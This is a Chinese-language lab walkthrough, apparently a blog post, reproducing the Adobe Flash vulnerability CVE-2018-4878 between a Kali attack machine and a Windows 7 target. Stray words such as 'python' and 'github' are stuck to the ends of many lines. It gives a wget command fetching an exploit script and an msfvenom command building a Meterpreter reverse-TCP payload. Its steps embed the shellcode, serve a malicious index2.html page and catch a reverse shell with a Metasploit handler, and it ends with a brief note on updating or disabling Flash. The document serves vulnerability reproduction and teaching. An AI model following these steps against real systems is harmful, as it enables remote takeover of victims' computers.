1、前言介紹 html
2018年2月1號,Adobe官方發佈安全通報(APSA18-01),聲明Adobe Flash 28.0.0.137及其以前的版本,存在高危漏洞(CVE-2018-4878)。python
從Adobe公告來看,這個漏洞的野外攻擊樣本最先是由韓國計算機應急響應小組(KRCERT)發現的,而KR-CERT也表示,來自朝鮮的黑客組織已經成功利用這個0Day 漏洞發 起攻擊。git
攻擊者經過構造特殊的Flash連接,當用戶用瀏覽器/郵件/Office訪問此Flash連接時,會 被「遠程代碼執行」,而且直接被getshell。github
2、本文測試環境 web
攻擊機:kali IP:192.168.44.128shell
靶機:windows7 IP:192.168.44.140+IE8+FLASH Player28.0.0.137(及之前版本)apache
一、下載CVE-2018-4878利用腳本到kali機 wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018- 4878.rarwindows
二、解壓後以下圖,可看到cve-2018-4878.py,exploit.swf 其實以後咱們仍是要本身生成一個index2.html的瀏覽器
三、Windows7 安裝flash插件安全
3、漏洞復現
一、先在kali裏面把cve-2018-4878.py的stageless = True修改爲False
二、使用msf生成shell代碼
msfvenom -p windows/meterpreter/reverse_tcp lhost=your host lport=your port -f python>shellcode.txt
其中:lhost爲kali的ip地址,lport爲監聽的端口
查看生成的shellcode.txt
三、將生成的shellcode.txt的內容更換到cve-2018-4878.py的shellcode
四、在kali下執行cve-2018-4878.py,注意要和index2.html,在同一個文件夾下
五、在kali裏面開啓Apache2服務,並將兩個文件放到/var/www/html目錄(apache web路徑)
如今,kali上的web服務已經啓動,而且已經有了index2.html這個web頁面,咱們須要用靶機win7訪問這個頁面
六、kali上開啓shell會話監聽
進入msf,使用handler監聽模塊
回彈一個tcp鏈接
設置kali的ip,監聽的端口號
啓動服務
七、使用win7靶機的已開啓flash服務的瀏覽器進行訪問index2.html
八、回到kali,已經進入meterpreter模塊
九、當靶機訪問惡意的index2.html頁面,便可觸發反彈shell
4、漏洞修復
將flash經過官網升級到最新版本
或者,關閉flash的使用